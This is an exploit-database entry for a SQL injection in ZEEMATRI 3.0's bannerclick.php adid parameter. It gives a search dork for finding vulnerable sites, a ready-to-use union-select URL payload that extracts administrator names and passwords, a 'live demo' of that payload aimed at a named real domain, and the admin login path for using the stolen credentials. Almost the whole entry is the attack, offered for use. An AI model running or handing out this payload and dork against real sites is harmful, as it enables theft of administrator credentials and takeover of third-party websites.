id: 4140
date: 11/09/2008
title: ZEEMATRI 3.0 (bannerclick.php adid) SQL Injection Vulnerability
author: Hussin X
cves: 

===============================================================
ZEEMATRI 3.0 (bannerclick.php adid) SQL Injection Vulnerability
===============================================================


|___________________________________________________|
|
| ZEEMATRI v3.0 (bannerclick.php adid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|
|___________________________________________________
|                                                   |
|
| script: http://zeeways.com/php-software/zeematri-v3.0.html
|
| Dork: "Powered by ZeeMatri"
|
|___________________________________________________|

Exploit:
________



www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--




L!VE DEMO:
_________


http://zeematri.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--


___________________


Admin  LogiN :

www.[target].com/Script/admin/




#  0day.today [2023-03-25]  #